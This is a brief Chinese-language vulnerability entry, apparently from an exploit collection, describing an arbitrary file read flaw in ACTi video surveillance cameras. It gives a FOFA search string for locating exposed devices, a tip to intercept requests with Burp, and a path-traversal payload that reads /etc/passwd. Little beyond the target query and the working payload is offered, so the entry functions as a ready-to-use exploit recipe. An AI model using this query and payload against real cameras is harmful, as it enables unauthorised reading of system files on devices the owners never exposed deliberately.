# ACTI 视频监控 任意文件读取漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

ACTI 视频监控 存在任意文件读取漏洞

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

ACTI摄像头

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="ACTi-视频监控"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqHtyu1sovv2w7iw6O%2F-MhqwPI_NnQ9LZ8tC4KG%2Fimage.png?alt=media\&token=4710e702-cd3c-43cc-8031-d5f2aea470f4)

使用Burp抓包

```
/images/../../../../../../../../etc/passwd
```